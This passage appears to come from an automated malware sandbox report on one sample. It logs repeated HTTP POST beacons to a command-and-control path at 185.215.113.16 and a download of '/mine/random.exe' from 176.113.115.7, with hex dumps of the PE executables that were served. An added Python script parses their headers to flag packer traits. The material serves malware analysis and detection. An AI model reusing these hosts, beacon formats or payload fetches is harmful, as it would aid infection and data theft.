00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2a 00 00 20 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 70 68 6e 62 79 73 65 00 00 1a 00 00 b0 30 00 00 fa 19 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 
62 67 63 7a 75 67 64 00 10 00 00 00 b0 4a 00 00 06 00 00 00 e6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 ec 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELTgJ@JT@Wk
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 13:56:32 GMTETag: "b1028-63167701c47f2"Accept-Ranges: bytesContent-Length: 725032Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 09 00 28 7a e5 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 84 04 00 00 e6 00 00 00 00 00 00 b0 5c 03 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0b 00 00 06 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 28 05 00 28 00 00 00 00 00 00 00 00 00 00 00 00 80 05 00 6c 15 00 00 00 ea 0a 00 28 26 00 00 00 e0 05 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 a1 04 00 40 01 00 00 00 00 00 00 00 00 00 00 d8 2a 05 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 65 83 04 00 00 10 00 00 00 84 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7c a5 00 00 00 a0 04 00 00 a6 00 00 00 8a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 21 00 00 00 50 05 00 00 0c 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 6c 15 00 00 00 80 05 00 00 16 00 00 00 3c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 78 66 67 00 00 00 d0 13 00 00 00 a0 05 00 00 14 00 00 00 52 05 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 74 70 6c 6e 65 8c 00 00 00 00 c0 05 00 00 02 00 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5f 52 44 41 54 41 00 00 f4 01 00 00 00 d0 05 00 00 02 00 00 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 88 06 00 00 00 e0 05 00 00 08 00 00 00 6a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 63 53 73 00 00 00 00 00 78 05 00 00 f0 05 00 00 78 05 00 00 72 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd(zg"\@p`H((l(&@*h.text
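Every one of the six responses above is served as `application/x-msdos-program` and opens with an MZ/PE header, so the first few hundred bytes of each hex dump are enough to read the file header and the section table without the rest of the payload. The script below is an added example and not part of the Joe Sandbox report: it walks the DOS header, PE signature, IMAGE_FILE_HEADER, optional header and section headers, then applies header-only heuristics of the kind sandbox signatures use for space-padded section names, sections that are writable and executable, and sections with far more virtual than raw size. The first input is the leading 528 bytes of the 362496-byte response (Date: 15:56:19), transcribed field by field from its hex dump; the second is the seven section headers of the 1953792-byte response (Date: 15:55:21), which sit at file offset 0x1f8 in that dump, together with the AddressOfEntryPoint value (0x4d9000) read from its optional header. Function names, the 4x virtual-to-raw ratio and the 0x10000 floor are this example's own choices.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
Z = "00000000"     # one zero dword
Z12 = "00" * 12    # PointerToRelocations .. NumberOfLinenumbers, zero in every header here

# Leading 528 bytes of the 362496-byte download (response dated 15:56:19), transcribed from its hex dump.
CLEAN_HEADER = (
    bytes.fromhex("4d5a7800" "01000000" "04000000" + Z * 3 + "40000000" + Z * 8 + "78000000")  # IMAGE_DOS_HEADER
    + bytes.fromhex("0e1fba0e00b409cd21b8014ccd21") + b"This program cannot be run in DOS mode.$\x00\x00"
    + bytes.fromhex("50450000" "4c01" "0400" "e254e167" + Z * 2 + "e000" "0201")  # PE\0\0, i386, 4 sections
    + bytes.fromhex(  # IMAGE_OPTIONAL_HEADER32: standard and Windows fields, then 16 data directories
        "0b01" "0e00" "00d20400" "00b20000" "00000000" "20b10000" "00100000" "00000000"
        "00004000" "00100000" "00020000" "0600" "0000" "0000" "0000" "0600" "0000"
        "00000000" "00400600" "00040000" "00000000" "0200" "4085"
        "00001000" "00100000" "00001000" "00100000" "00000000" "10000000"
        + Z * 2 + "8b0b0500" "8c000000" + Z * 6 + "00000600" "d03a0000" + Z * 12 + "d00c0500" "b8000000" + Z * 6)
    + bytes.fromhex(  # four IMAGE_SECTION_HEADERs
        "2e74657874000000" "5cd00400" "00100000" "00d20400" "00040000" + Z12 + "20000060"
        "2e72646174610000" "37200000" "00f00400" "00220000" "00d60400" + Z12 + "40000040"
        "2e64617461000000" "04d60000" "00200500" "00540000" "00f80400" + Z12 + "400000c0"
        "2e72656c6f630000" "d03a0000" "00000600" "003c0000" "004c0500" + Z12 + "40000042")
)

# The seven IMAGE_SECTION_HEADERs of the 1953792-byte download (response dated 15:55:21), file offset 0x1f8,
# transcribed from its hex dump; the AddressOfEntryPoint field of that header reads 0x4d9000.
PACKED_SECTIONS = bytes.fromhex(
    "2020200020202020" "00c00600" "00100000" "00d60200" "00100000" + Z12 + "400000e0"
    "2e72737263000000" "44030000" "00d00600" "00040000" "00e60200" + Z12 + "400000c0"
    "2e69646174612020" "00100000" "00e00600" "00020000" "00ea0200" + Z12 + "400000c0"
    "2020202020202020" "00d02b00" "00f00600" "00020000" "00ec0200" + Z12 + "400000e0"
    "6c646e6978626d74" "00c01a00" "00c03200" "00bc1a00" "00ee0200" + Z12 + "400000e0"
    "6c74797876676161" "00100000" "00804d00" "00040000" "00aa1d00" + Z12 + "400000e0"
    "2e74616767616e74" "00300000" "00904d00" "00220000" "00ae1d00" + Z12 + "400000e0")
PACKED_ENTRY = 0x4D9000


def parse_section_headers(raw, count, offset=0):
    """Decode `count` consecutive 40-byte IMAGE_SECTION_HEADER records starting at raw[offset]."""
    sections = []
    for i in range(count):
        name, vsize, va, rsize, rptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", raw, offset + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vsize": vsize, "va": va,
                         "rsize": rsize, "rptr": rptr, "chars": chars})
    return sections


def parse_pe(blob):
    """Walk DOS header -> PE signature -> IMAGE_FILE_HEADER -> optional header -> section table."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew")
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, e_lfanew + 4)
    opt = e_lfanew + 24                                   # optional header follows the 20-byte file header
    magic, = struct.unpack_from("<H", blob, opt)
    entry, = struct.unpack_from("<I", blob, opt + 16)     # AddressOfEntryPoint, same offset in PE32 and PE32+
    size_of_image, = struct.unpack_from("<I", blob, opt + 56)
    return {"machine": machine, "timestamp": timestamp, "magic": magic, "entry": entry,
            "size_of_image": size_of_image, "sections": parse_section_headers(blob, nsections, opt + opt_size)}


def section_anomalies(sections, entry=None):
    """Header-only packer heuristics; the 4x ratio and 0x10000 floor are this example's own thresholds."""
    findings = []
    for s in sections:
        n = s["name"]
        if not n or any(not 0x21 <= ord(c) <= 0x7E for c in n):
            findings.append(f"{n!r}: empty, space-padded or non-printable section name")
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{n!r}: writable and executable")
        if s["vsize"] >= 0x10000 and s["vsize"] > 4 * s["rsize"]:
            findings.append(f"{n!r}: VirtualSize 0x{s['vsize']:x} vs SizeOfRawData 0x{s['rsize']:x} (room to unpack into)")
    if entry is not None and sections:
        last = sections[-1]
        if last["va"] <= entry < last["va"] + max(last["vsize"], last["rsize"]):
            findings.append(f"entry point 0x{entry:x} is inside the last section {last['name']!r}")
    return findings


def file_size_from_sections(sections):
    """Where the last section's raw data ends; for an unmodified file this equals the download size."""
    last = max(sections, key=lambda s: s["rptr"])
    return last["rptr"] + last["rsize"]


if __name__ == "__main__":
    clean = parse_pe(CLEAN_HEADER)
    print([s["name"] for s in clean["sections"]], section_anomalies(clean["sections"], clean["entry"]))
    for finding in section_anomalies(parse_section_headers(PACKED_SECTIONS, 7), PACKED_ENTRY):
        print(finding)
```

Both transcriptions can be checked against the page by arithmetic: the last section's PointerToRawData plus SizeOfRawData equals the response's Content-Length (0x58800 = 362496 and 0x1dd000 = 1953792, which is also the leading field of each ETag), and every VirtualAddress is the previous section's end rounded up to SectionAlignment. The first sample produces no findings; the second reports three space-padded names, five writable-and-executable sections, a 0x2bd000-byte section backed by 0x200 bytes on disk, and an entry point at the start of the last section, which is what a runtime unpacker looks like from the headers alone.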
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 156 | Cache-Control: no-cache | Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 | Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 32 31 38 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1021872001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 156 | Cache-Control: no-cache | Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 | Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 156 | Cache-Control: no-cache | Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 | Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 156 | Cache-Control: no-cache | Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 | Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 156 | Cache-Control: no-cache | Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 | Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 156 | Cache-Control: no-cache | Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 | Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 156 | Cache-Control: no-cache | Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 | Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 156 | Cache-Control: no-cache | Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 | Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 156 | Cache-Control: no-cache | Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 | Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 156 | Cache-Control: no-cache | Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 | Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
